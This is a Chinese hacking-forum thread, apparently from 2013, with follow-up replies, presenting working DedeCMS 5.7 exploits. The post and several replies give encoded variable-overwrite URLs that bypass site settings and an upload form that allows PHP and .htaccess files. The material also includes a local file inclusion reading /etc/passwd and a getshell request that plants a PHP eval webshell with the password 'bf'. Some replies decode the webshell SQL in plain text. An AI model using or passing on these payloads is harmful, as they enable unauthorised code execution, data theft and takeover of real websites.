我来说说最新这个dedecms getshell 不成功的原因吧

2013-06-08 12:09:48 71 10350 7
如题直接给代码
data/config.cache.inc.php
$cfg_mysql_type = 'mysql';
include/common.inc.php
//引入数据库类
if ($GLOBALS['cfg_mysql_type'] == 'mysqli' && function_exists("mysqli_init")) //如果配置的是 mysql 或者 mysqli_init() 支持这个函数 都是可以成功的
{
    require_once(DEDEINC.'/dedesqli.class.php');
} else {
    require_once(DEDEINC.'/dedesql.class.php'); //漏洞文件出在这里 具体不分析了
}
写个主要是看到很多人唧唧歪歪 的说什么不行 骗子什么的 不懂表乱说 多看几行代码!
多说一句 只对dede5.7 有效 dede5.6 因为官方重新封装了chr 函数
但是 在调用这个chr 函数的时候没有成功 会爆路径

虽然自己在很早前也发现了这个漏洞 但是 既然漏洞已经公布 我也马后炮一下吧 自己当成写了几个exp 但是没有前一位基友写的好
$cfg_mb_addontype = 'swf|mpg|mp3|rm|rmvb|wmv|wma|wav|mid|mov|zip|rar|doc|xsl|ppt|wps';
覆盖 $cfg_mb_addontype 的上传漏洞
<form name="form1" action="http://loalhost/member/uploads_add.php?arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=109&arrs1[]=98&arrs1[]=95&arrs1[]=97&arrs1[]=100&arrs1[]=100&arrs1[]=111&arrs1[]=110&arrs1[]=116&arrs1[]=121&arrs1[]=112&arrs1[]=101&arrs2[]=124&arrs2[]=46&arrs2[]=104&arrs2[]=116&arrs2[]=97&arrs2[]=99&arrs2[]=99&arrs2[]=101&arrs2[]=115&arrs2[]=115&arrs2[]=13&arrs2[]=10&arrs2[]=124&arrs2[]=97&arrs2[]=115&arrs2[]=97&arrs2[]=124&arrs2[]=99&arrs2[]=100&arrs2[]=120&arrs2[]=124&arrs2[]=99&arrs2[]=101&arrs2[]=114&arrs2[]=124&arrs2[]=97&arrs2[]=115&arrs2[]=104&arrs2[]=120&arrs2[]=124&arrs2[]=112&arrs2[]=104&arrs2[]=116&arrs2[]=109&arrs2[]=108&arrs2[]=124&arrs2[]=80&arrs2[]=32&arrs2[]=104&arrs2[]=112&arrs2[]=124&arrs2[]=80&arrs2[]=32&arrs2[]=72&arrs2[]=80&arrs2[]=124&arrs2[]=80&arrs2[]=104&arrs2[]=112&arrs2[]=124&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=124" method="post" enctype="multipart/form-data" >
  <input type="hidden" name="mediatype" value="4" />
  <input type="hidden" name="dopost" value="save" />
  <input name="addonfile" type="file" id="addonfile" />
  <button class="button2" type="submit" >提交</button><br>
1,必须登陆用户。<br>
2,将待上传PHP文件扩展名改为“P hp”。即可上传Php<br>
3,其他|.htaccess |asa|cdx|cer|ashx|phtml直接上传<br>
</form>
还记得我上次发的 feedback.php 文件 2次注入么? 虽然我当初没有绕过60个字节 但是还有xss 嘛
但是很多基友说 评论关闭了 不允许游客 发表 很鸡肋 ---------- 真的很鸡肋么
系统已经禁止评论功能!

&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=102&arrs1[]=101&arrs1[]=101&arrs1[]=100&arrs1[]=98&arrs1[]=97&arrs1[]=99&arrs1[]=107&arrs1[]=95&arrs1[]=102&arrs1[]=111&arrs1[]=114&arrs1[]=98&arrs1[]=105&arrs1[]=100&arrs2[]=99

绕过游客禁止评论

&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=102&arrs1[]=101&arrs1[]=101&arrs1[]=100&arrs1[]=98&arrs1[]=97&arrs1[]=99&arrs1[]=107&arrs1[]=95&arrs1[]=103&arrs1[]=117&arrs1[]=101&arrs1[]=115&arrs1[]=116&arrs2[]=99

还有要审核后才能看  办法总是有的
过审核:

feedback.php?aid=609&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=102&arrs1[]=101&arrs1[]=101&arrs1[]=100&arrs1[]=98&arrs1[]=97&arrs1[]=99&arrs1[]=107&arrs1[]=99&arrs1[]=104&arrs1[]=101&arrs1[]=99&arrs1[]=107&arrs2[]=99

上次有基友发布了一个dede 包含漏洞
又很多人说关闭了会员很鸡肋
我就不说 绕过会员关闭
/plus/carbuyaction.php?dopost=return&code=../../../../../../../../../etc/passwd%00&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=109&arrs1[]=98&arrs1[]=95&arrs1[]=111&arrs1[]=112&arrs1[]=101&arrs1[]=110&arrs1[]=99&_REQUEST[code]=alipay

再来一发 会员开启 禁止注册绕过

member/index_do.php?fmdo=user&dopost=regnew&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=109&arrs1[]=98&arrs1[]=95&arrs1[]=97&arrs1[]=108&arrs1[]=108&arrs1[]=111,&arrs1[]=119&arrs1[]=114&arrs1[]=101&arrs1[]=103&arrs2[]=99

汗珍藏了快一年的0day 就这样消失了

给最新getshell exp

这个是 imspider 给出的方法 很赞 是update 的方法 有点缺陷 听说有大牛找了insert 的方法  想要的自己去找吧
http://localhost/uploads/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=64&arrs2[]=102&arrs2[]=111&arrs2[]=112&arrs2[]=101&arrs2[]=110&arrs2[]=40&arrs2[]=34&arrs2[]=98&arrs2[]=102&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=34&arrs2[]=44&arrs2[]=32&arrs2[]=92&arrs2[]=39&arrs2[]=97&arrs2[]=92&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=119&arrs2[]=114&arrs2[]=105&arrs2[]=116&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=44&arrs2[]=32&arrs2[]=92&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=64&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=98&arrs2[]=102&arrs2[]=93&arrs2[]=41&arrs2[]=32&arrs2[]=63&arrs2[]=62&arrs2[]=92&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=34&arrs2[]=79&arrs2[]=75&arrs2[]=34&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=99&arrs2[]=108&arrs2[]=111&arrs2[]=115&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=35

http://localhost/uploads/plus/mytag_js.php?aid=1
看源代码 如果返回 ok 就表示 成功
http://localhost/uploads/plus/bf.php 密码 bf


找后台? 又这个必要么???????????

关于作者

冰封35篇文章787篇回复

评论71次

要评论?请先  登录  或  注册
  • 11楼
    2013-6-8 13:40

    楼主是我心目中的神,真是给力啊!

  • 10楼
    2013-6-8 13:34

    这漏洞挺明显的,我也很早就发现了。果然不出所料,很多人知道都不愿意发出来,那么我来当了一次罪人。

  • 9楼
    2013-6-8 13:31

    感谢分享

  • 8楼
    2013-6-8 13:19

    insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?php eval($_POST[c]) ?>\');echo "OK";@fclose($fp);{/dede:php}'); 怎么执行这段呢

  • 7楼
    2013-6-8 13:11

    直接getshell 那个表段基本都没数据,成功率不高

  • 6楼
    2013-6-8 12:53

    不是哦

  • 5楼
    2013-6-8 12:50

    insert 怎么写?

  • 4楼
    2013-6-8 12:47

    各种牛逼啊。。。。学xi。

  • 3楼
    2013-6-8 12:40

    cfg_dbprefixmytag` SET `normbody` = '{dede:php}$fp = @fopen("bf.php", \'a\');@fwrite($fp, \'<?php @eval($_POST[bf]) ?>\');echo "OK";@fclose($fp);{/dede:php}' WHERE `aid` =1# 用小葵的那个编码工具直接转换 Asc --------------------------------------- 话说dedecms 都成月球表面 万人骑 我都不想去玩了 没事挖挖wp的插件漏洞玩的不亦乐乎 嘻嘻~

  • 2楼
    2013-6-8 12:29

    楼主四川的????

  • 1楼
    2013-6-8 12:18

    http://localhost/uploads/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=64&arrs2[]=102&arrs2[]=111&arrs2[]=112&arrs2[]=101&arrs2[]=110&arrs2[]=40&arrs2[]=34&arrs2[]=98&arrs2[]=102&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=34&arrs2[]=44&arrs2[]=32&arrs2[]=92&arrs2[]=39&arrs2[]=97&arrs2[]=92&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=119&arrs2[]=114&arrs2[]=105&arrs2[]=116&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=44&arrs2[]=32&arrs2[]=92&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=64&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=98&arrs2[]=102&arrs2[]=93&arrs2[]=41&arrs2[]=32&arrs2[]=63&arrs2[]=62&arrs2[]=92&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=34&arrs2[]=79&arrs2[]=75&arrs2[]=34&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=99&arrs2[]=108&arrs2[]=111&arrs2[]=115&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=35
    这个url是用什么工具生成的?一个个手动转成ascii码?